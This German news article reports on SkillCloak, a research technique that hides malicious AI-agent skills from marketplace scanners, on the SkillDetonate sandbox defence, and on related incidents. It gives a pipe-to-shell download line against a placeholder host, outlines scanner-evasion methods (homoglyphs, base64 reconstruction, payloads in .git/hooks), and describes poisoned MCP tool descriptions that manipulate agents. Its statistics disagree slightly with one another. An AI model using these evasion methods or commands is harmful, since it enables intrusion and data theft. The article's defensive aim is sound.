Können Sie Ihrem KI-Coding-Agenten noch vertrauen? Eine neue Angriffstechnik namens SkillCloak zeigt, dass selbst geprüfte Skills aus offiziellen Marktplätzen hochgefährliche Malware enthalten können – und kein statischer Scanner sie erkennt. Während Unternehmen weltweit KI-Agenten in ihre Entwicklungs- und Geschäftsprozesse integrieren, öffnet sich eine Flanke, die selbst erfahrene Sicherheitsteams überrascht: Die vermeintlich harmlosen „Skills“, mit denen Agenten wie Claude Code oder OpenAI Codex neue Fähigkeiten erlernen, sind ein Einfallstor für Angreifer – und die Tarnkappen-Techniken werden immer raffinierter.
Die jüngsten Enthüllungen sind alarmierend: Bitdefender entdeckte, dass fast 17 Prozent aller Skills auf dem OpenClaw-Marktplatz bösartig sind (Quelle 3). Koi Security identifizierte in der „ClawHavoc“-Kampagne zunächst 341, später 824 infizierte Skills. Und Unit 42 von Palo Alto Networks fand fünf hochgradig evasive Skills auf ClawHub – darunter einen, der Scanner durch einen 22 Megabyte großen Junk-Block in der README-Datei austrickste (Quelle 4). Vor diesem Hintergrund veröffentlichten Forscher der Hong Kong University of Science and Technology nun die Vorabveröffentlichung „Cloak and Detonate: Scanner Evasion and Dynamic Detection of Agent Skill Malware“ (Quelle 1) – und demonstrieren darin, wie einfach sich bösartige Skills an jedem Scanner vorbeischmuggeln lassen.
Was sind Agent-Skills und warum sind sie riskant?
KI-Coding-Agenten wie Claude Code, OpenAI Codex oder OpenClaw sind längst mehr als einfache Chatbots. Sie können eigenständig Code schreiben, Terminalbefehle ausführen, Dateien manipulieren und mit externen Diensten interagieren. Um ihre Fähigkeiten modular zu erweitern, setzen sie auf sogenannte Skills: kleine Pakete, die aus einer Markdown-Anleitung und ausführbaren Skripten bestehen. Diese Skills werden von Community-Marktplätzen wie ClawHub oder SkillHub heruntergeladen und mit den vollen Rechten des Agenten ausgeführt.
Genau hier liegt das Problem. Ein Skill, der vorgibt, eine nützliche Funktion wie „PDF-Zusammenfassung“ oder „automatische Commit-Nachrichten“ bereitzustellen, kann im Hintergrund sensible Dateien auslesen, Passwörter stehlen, eine Reverse Shell öffnen oder eine Backdoor installieren. Anders als bei klassischen Paketmanagern (npm, PyPI) gibt es für Agent-Skills noch keine etablierten Sicherheitsstandards. Die Marktplätze verlassen sich meist auf statische Scanner, die den Code auf bekannte Muster prüfen – ein Ansatz, der sich mit SkillCloak als nahezu wirkungslos erwiesen hat.
Die Architektur des Vertrauensproblems
Ein KI-Agent führt Skills nicht in einer isolierten Sandbox aus, sondern in derselben Umgebung, in der er auch auf das Dateisystem, Netzwerkressourcen und oft auf Cloud-Dienste zugreift. Ein kompromittierter Skill kann daher:
- Dateien lesen und exfiltrieren: SSH-Keys, .env-Dateien, Zugangsdaten.
- Terminalbefehle ausführen: Installation von Persistenz-Mechanismen, Ausweitung auf andere Systeme.
- Supply-Chain-Angriffe starten: Manipulation von Build-Prozessen oder CI/CD-Pipelines.
- Als Sprungbrett dienen: Laterale Bewegung im Netzwerk, Ausnutzung von Vertrauensstellungen.
Die Parallelen zu den frühen Tagen von npm-Malware sind unübersehbar – nur dass die potenzielle Schadwirkung durch die autonome Handlungsfähigkeit der Agenten noch größer ist. Wie wir bereits im Fall von JadePuffer: KI-Agent-Ransomware über Langflow berichteten, können Angreifer KI-Agenten gezielt als Waffe einsetzen.
Wie SkillCloak Scanner täuscht
Das Forschungsteam der HKUST entwickelte mit SkillCloak einen systematischen Rahmen, um bösartige Skills so zu tarnen, dass sie von statischen Scannern nicht mehr erkannt werden – ohne ihre schädliche Funktionalität einzubüßen. Die Methode kombiniert zwei Techniken: Structural Obfuscation und Self-Extracting Skill (SFS) Packing.
Structural Obfuscation: Tarnung durch semantische Äquivalenz
Bei der strukturellen Verschleierung wird der sichtbare Code so verändert, dass er für Scanner harmlos aussieht, aber zur Laufzeit dasselbe tut. Konkret nutzt SkillCloak:
- Look-alike-Zeichen: Ersetzung von Buchstaben durch optisch ähnliche Unicode-Zeichen (z. B. kyrillisches „а“ statt lateinischem „a“), die von Scannern nicht als Teil eines bekannten Befehls erkannt werden.
- Befehlsaufteilung: Schädliche Kommandos werden über Zeilenumbrüche, Variablen oder String-Konkatenation fragmentiert, sodass signaturbasierte Scanner die Muster nicht mehr matchen können.
- Indirekte Ausführung: Statt
curl böse-seite.de | bashwird der Befehl aus einer Base64-codierten Zeichenkette oder einer Umgebungsvariable rekonstruiert.
Das Entscheidende: Die Angriffssemantik bleibt vollständig erhalten. Der Agent führt am Ende exakt denselben schädlichen Code aus – nur der Weg dorthin ist für statische Analysewerkzeuge nicht mehr nachvollziehbar.
Self-Extracting Skill (SFS) Packing: Verstecken in toten Winkeln
Noch effektiver ist das SFS Packing. Hier werden die bösartigen Komponenten eines Skills in Verzeichnisse ausgelagert, die von Scannern standardmäßig ignoriert werden – etwa .git/, __pycache__/ oder versteckte Ordner. Der sichtbare Teil des Skills enthält nur einen harmlosen Loader, der zur Laufzeit die versteckten Dateien ausliest, dekomprimiert und ausführt.
Diese Technik macht sich eine fundamentale Schwäche statischer Scanner zunutze: Sie analysieren nur die offensichtlichen Dateien eines Pakets und überspringen Verzeichnisse, die als irrelevant gelten. In der Praxis bedeutet das: Ein Skill kann eine vollständige Reverse-Shell-Implementierung in .git/hooks/pre-commit verstecken, während die skill.md nur eine harmlose Anleitung enthält. Der Scanner sieht nur die harmlose Datei – der Agent führt dennoch die versteckte Payload aus.
Ein reales Beispiel lieferte der Skill omnicogg, den Unit 42 auf ClawHub entdeckte: Er vergrößerte die README-Datei um 22 Megabyte Junk-Daten, um das Größenlimit des integrierten Scanners zu sprengen – der Scanner brach die Analyse ab, und der Skill passierte ungeprüft (Quelle 4).
Zahlen: Ergebnisse über 1.613 reale Skills
Die Forscher testeten SkillCloak gegen acht verschiedene Scanner und 1.613 reale bösartige Skills aus den Marktplätzen ClawHub und SkillHub. Die Ergebnisse sind ein Weckruf für die gesamte Branche (Quelle 1):
- SFS Packing umging jeden einzelnen Scanner in über 90 Prozent der Fälle – bei den meisten Scannern lag die Umgehungsrate sogar bei über 99 Prozent.
- Structural Obfuscation erreichte Umgehungsraten von über 80 Prozent auf den meisten Scannern und bis zu 96 Prozent auf einem hybriden Scanner, der statische und dynamische Elemente kombinierte.
- Die getarnten Skills funktionierten auf Claude Code und OpenAI Codex genauso zuverlässig wie die Originale – die Tarnung beeinträchtigte die Ausführung nicht.
- Ciscos leistungsfähigster Scanner, der vor dem Cloaking 99 Prozent der bösartigen Skills erkannte, fand danach nur noch rund 10 Prozent.
Diese Zahlen belegen: Statische Scanner sind in ihrer aktuellen Form kein wirksamer Schutz gegen gezielte Evasion-Techniken. Wer sich auf sie verlässt, wiegt sich in falscher Sicherheit.
SkillDetonate: Verhaltensbasierte Abwehr
Als Gegenmittel entwickelten die Forscher SkillDetonate – einen Laufzeit-Checker, der Skills in einer kontrollierten Sandbox ausführt und ihr tatsächliches Verhalten beobachtet. Statt den Code nur zu lesen, wird er ausgeführt, und alle Aktionen werden protokolliert: Dateizugriffe, Netzwerkverbindungen, Prozessstarts, Shell-Befehle.
So funktioniert SkillDetonate
SkillDetonate setzt auf eine mehrstufige Analyse:
- Sandbox-Ausführung: Der Skill wird in einer isolierten Umgebung mit eingeschränkten Rechten gestartet.
- Verhaltensprofilierung: Alle Systemaufrufe, Dateioperationen und Netzwerkaktivitäten werden aufgezeichnet und mit einer Baseline harmloser Skills verglichen.
- Anomalie-Erkennung: Abweichungen wie der Zugriff auf
/etc/passwd, ausgehende Verbindungen zu unbekannten Hosts oder die Ausführung voncurl | bash-Mustern schlagen Alarm. - Heuristische Regeln: Bekannte Angriffsmuster (Reverse Shells, Credential Dumping, Persistenz-Installation) werden zusätzlich über regelbasierte Detektion erkannt.
In kontrollierten Tests erkannte SkillDetonate 97 Prozent der Angriffe bei einer Falsch-Positiv-Rate von nur 2 Prozent. Bei realen bösartigen Skills aus den Marktplätzen lag die Erkennungsrate bei 87 Prozent – ein dramatischer Unterschied zu den einstelligen Erkennungsraten der statischen Scanner nach dem Cloaking.
Grenzen der dynamischen Analyse
Allerdings ist auch SkillDetonate nicht perfekt. Zeitverzögerte Payloads („schlafende“ Malware, die erst nach Tagen aktiv wird) oder kontextabhängige Angriffe (die nur bei bestimmten Umgebungsvariablen zuschlagen) können die Sandbox-Analyse unterlaufen. Zudem erfordert die dynamische Ausführung mehr Ressourcen und Zeit als ein statischer Scan – ein Faktor, der bei großen Marktplätzen mit Tausenden von Skills ins Gewicht fällt.
Realer Missbrauch: OpenClaw, ClawHavoc, Unit 42
SkillCloak ist keine akademische Spielerei. Die Bedrohung ist real und bereits aktiv. Mehrere Sicherheitsfirmen haben in den letzten Monaten umfangreiche Kampagnen dokumentiert.
Bitdefender: 17 Prozent bösartige Skills auf OpenClaw
Bitdefender Labs analysierte den OpenClaw-Marktplatz und fand, dass fast jeder sechste Skill bösartig war (Quelle 3). Die Spanne reichte von simplen Credential-Stealern bis zu vollwertigen Remote-Access-Trojanern. Viele dieser Skills waren seit Monaten online und wurden hunderte Male heruntergeladen – ohne dass der integrierte Scanner Alarm schlug.
Koi Security: Die ClawHavoc-Kampagne
Koi Security entdeckte eine koordinierte Kampagne namens ClawHavoc, die zunächst 341, später 824 bösartige Skills umfasste. Die Angreifer nutzten dabei bereits frühe Formen der Verschleierung, um die Scanner zu umgehen. Die Kampagne zielte vor allem auf Entwickler ab, die Claude Code in ihren CI/CD-Pipelines einsetzen – ein Szenario, das wir auch im Artikel über Agentic Arbitrage und gefährdete Softwareausgaben beleuchtet haben.
Unit 42: Fünf evasive Skills auf ClawHub
Unit 42 von Palo Alto Networks identifizierte fünf besonders raffinierte Skills auf ClawHub, die trotz des integrierten Scannings unentdeckt blieben (Quelle 4). Neben dem bereits erwähnten omnicogg mit seinem 22-MB-Junk-Block fanden die Forscher Skills, die:
- Schädlichen Code in Base64-codierten Strings in harmlos aussehenden Konfigurationsdateien versteckten.
- Die eigentliche Payload erst bei der ersten Ausführung von einem externen Server nachluden.
- Sich als beliebte Open-Source-Tools tarnten, um Vertrauen zu erschleichen.
Diese Funde zeigen, dass die Angreifer die Funktionsweise der Scanner genau studieren und gezielt deren Schwachstellen ausnutzen – ein Katz-und-Maus-Spiel, das an die Entwicklung von Exploit-Kits für Browser-Schwachstellen erinnert.
Verwandte Angriffe: DNS-Payloads und vergiftete MCP-Tools
SkillCloak ist nicht die einzige Bedrohung für KI-Agenten. Parallel haben Forscher weitere Angriffsvektoren aufgedeckt, die das Vertrauen in Agenten-Ökosysteme grundlegend infrage stellen.
Mozilla 0DIN: Reverse Shell per DNS-TXT-Record
Ein besonders perfider Ansatz wurde von Mozillas 0DIN-Team demonstriert: Ein scheinbar sauberes GitHub-Repository, das als Skill für Claude Code diente, enthielt keinen schädlichen Code – stattdessen lud der Agent zur Laufzeit eine Payload über einen DNS-TXT-Record nach (Quelle 5). Der Skill selbst war völlig harmlos, der Scanner sah nichts, aber sobald der Agent den Skill ausführte, fragte er einen präparierten DNS-Server ab, erhielt die Payload als Text und führte sie aus. Das Ergebnis: eine vollständige Reverse Shell mit den Rechten des Agenten.
Dieser Angriff ist deshalb so tückisch, weil er die Grenzen jeder statischen Analyse aufzeigt. Solange der Skill nicht ausgeführt wird, ist keine schädliche Absicht erkennbar. Mozilla 0DIN kommentierte trocken: „Clone this repo and I own your machine.“
Microsoft: Vergiftete MCP-Tool-Descriptions
Microsoft warnte vor einer weiteren Angriffsfläche: MCP-Tool-Descriptions (Model Context Protocol). Dabei handelt es sich um Beschreibungen, die Agenten nutzen, um externe Tools anzusteuern – etwa um Rechnungen zu bezahlen oder Datenbankabfragen durchzuführen. Angreifer können diese Beschreibungen so manipulieren, dass der Agent unbeabsichtigte Aktionen ausführt. In einem dokumentierten Fall brachte eine vergiftete Beschreibung einen Finanz-Agenten dazu, unbezahlte Rechnungen mitsamt sensibler Zahlungsdaten zu leaken.
Diese Angriffe zeigen, dass die Sicherheitsprobleme von KI-Agenten nicht auf Skills beschränkt sind. Das gesamte Ökosystem – von Marktplätzen über MCP-Tools bis zu externen Datenquellen – muss als potenziell kompromittiert betrachtet werden. Wie der Fall Mastra npm und Sapphire Sleet: Nordkoreanischer Staatshacker im KI-Agenten-Ökosystem zeigt, haben auch staatliche Akteure diese Schwachstellen längst erkannt.
Vergleichstabelle: Scanner-Erkennungsraten vor und nach SkillCloak
Die folgende Tabelle fasst die dramatischen Unterschiede in den Erkennungsraten zusammen, basierend auf den Forschungsergebnissen der HKUST (Quelle 1) und ergänzenden Berichten (Quelle 2):
| Scanner / Typ | Erkennungsrate vor SkillCloak | Nach SFS Packing | Nach Structural Obfuscation |
|---|---|---|---|
| Cisco (statisch, signaturbasiert) | 99 % | ~10 % | ~20 % |
| Open-Source-Scanner A (YARA-basiert) | 87 % | < 1 % | ~15 % |
| Hybrid-Scanner B (statisch + leicht dynamisch) | 92 % | < 1 % | ~4 % |
| SkillDetonate (dynamisch, Sandbox) | 97 % | 87 % | 87 % |
Die Tabelle verdeutlicht: Während statische und hybride Scanner nach der Tarnung praktisch blind sind, behält ein verhaltensbasierter Ansatz wie SkillDetonate einen Großteil seiner Erkennungsfähigkeit. Der Unterschied zwischen 1 Prozent und 87 Prozent Erkennung ist der Unterschied zwischen einem offenen Scheunentor und einem wirksamen Schutz.
Prävention und was IT-Verantwortliche jetzt tun können
Die Forschungsergebnisse zu SkillCloak und die realen Missbrauchsfälle machen klar: Unternehmen, die KI-Agenten einsetzen, müssen ihre Sicherheitsstrategie überdenken. Hier sind die wichtigsten Handlungsempfehlungen:
1. Statischen Scannern nicht blind vertrauen
Die Studie zeigt, dass statische Scanner gegen gezielte Evasion-Techniken wirkungslos sind. Verlassen Sie sich nicht auf die integrierten Prüfmechanismen der Marktplätze. Betrachten Sie jeden Skill zunächst als potenziell bösartig – ähnlich wie bei E-Mail-Anhängen.
2. Verhaltensbasierte Erkennung implementieren
Setzen Sie auf dynamische Analysewerkzeuge wie SkillDetonate oder vergleichbare Sandbox-Lösungen. Führen Sie Skills vor dem produktiven Einsatz in einer isolierten Umgebung aus und protokollieren Sie alle Aktionen. Nur so erkennen Sie getarnte Payloads, die sich statischer Analyse entziehen.
3. Agenten mit minimalen Rechten ausstatten
Ein KI-Agent sollte niemals mit root- oder Administrator-Rechten laufen. Beschränken Sie den Zugriff auf das absolut notwendige Minimum: Nur die Verzeichnisse, die der Agent wirklich braucht, nur die Netzwerkziele, die für die Aufgabe erforderlich sind. Nutzen Sie Container oder virtuelle Maschinen, um den Explosionsradius einer Kompromittierung zu begrenzen.
4. Skills aus vertrauenswürdigen Quellen beziehen
Laden Sie Skills nur von verifizierten Herausgebern oder aus intern kuratierten Repositories. Prüfen Sie den Code manuell, bevor Sie ihn einem Agenten übergeben – insbesondere bei Skills, die Shell-Befehle oder Netzwerkzugriffe enthalten. Ein kritischer Blick auf die skill.md und die enthaltenen Skripte kann viele Angriffe bereits im Vorfeld stoppen.
5. Netzwerksegmentierung und Sandboxing
Isolieren Sie KI-Agenten netzwerktechnisch von produktiven Systemen. Ein Agent, der Entwicklungsaufgaben übernimmt, sollte keinen Zugriff auf Produktionsdatenbanken oder Finanzsysteme haben. Nutzen Sie Firewalls, um ausgehende Verbindungen auf bekannte, benötigte Ziele zu beschränken – das verhindert Exfiltration und Command-and-Control-Kommunikation.
6. Supply-Chain-Sicherheit ganzheitlich denken
Die Angriffe auf Agent-Skills sind Teil eines größeren Trends: Supply-Chain-Angriffe auf KI-Ökosysteme nehmen rasant zu. Wie die Fälle CISA warnt vor aktiv ausgenutzter SharePoint-RCE und Microsoft Patch Tuesday Juni 2026 mit 200 Schwachstellen zeigen, sind die Angriffsflächen vielfältig. Eine ganzheitliche Sicherheitsstrategie muss KI-Agenten, ihre Skills und die zugrunde liegende Infrastruktur gleichermaßen berücksichtigen.
7. Mitarbeiter sensibilisieren
Entwickler und IT-Teams müssen verstehen, dass KI-Agenten keine harmlosen Werkzeuge sind, sondern potenzielle Einfallstore für Angreifer. Schulen Sie Ihre Mitarbeiter im sicheren Umgang mit Agenten und Skills – analog zu Security-Awareness-Trainings für Phishing.
Im Fokus: SkillCloak und die Zukunft der KI-Agenten-Sicherheit
SkillCloak ist ein Weckruf. Die Forschung der HKUST zeigt systematisch, was Sicherheitsexperten seit Monaten befürchten: Die statischen Scanner, auf die sich Marktplätze für KI-Agenten-Skills verlassen, sind gegen gezielte Evasion-Techniken praktisch wirkungslos. Mit SFS Packing und Structural Obfuscation lassen sich bösartige Skills so tarnen, dass sie in über 99 Prozent der Fälle unerkannt bleiben – und dennoch voll funktionsfähig sind.
Die Konsequenzen sind gravierend. Wenn fast jeder fünfte Skill auf einem Marktplatz bösartig ist (Bitdefender), wenn hunderte getarnte Skills in koordinierten Kampagnen auftauchen (ClawHavoc) und wenn selbst integrierte Scanner durch simple Tricks wie 22-MB-Junk-Blöcke ausgehebelt werden (Unit 42), dann ist das Vertrauen in diese Ökosysteme fundamental erschüttert.
Der Ausweg liegt in der dynamischen Analyse. SkillDetonate beweist, dass verhaltensbasierte Erkennung mit 87 Prozent Trefferquote einen wirksamen Schutz bieten kann – auch gegen getarnte Angriffe. Unternehmen müssen jetzt handeln: Implementieren Sie Sandboxing, beschränken Sie Agenten-Rechte, und betrachten Sie jeden Skill als potenzielle Bedrohung. Die Zeit, in der man KI-Agenten blind vertrauen konnte, ist vorbei.
Die Forschung zu SkillCloak ist dabei erst der Anfang. Mit Angriffen über DNS-TXT-Records (Mozilla 0DIN) und vergifteten MCP-Tool-Descriptions (Microsoft) erweitert sich das Bedrohungsspektrum ständig. IT-Verantwortliche müssen diese Entwicklungen genau verfolgen und ihre Abwehrstrategien kontinuierlich anpassen. Der beste Schutz ist eine Kombination aus technischen Maßnahmen, organisatorischen Richtlinien und einem gesunden Misstrauen gegenüber allem, was ein KI-Agent aus dem Internet herunterlädt.
Quellen: arXiv 2607.02357 | The Hacker News | Bitdefender Labs | Unit 42 | Mozilla 0DIN
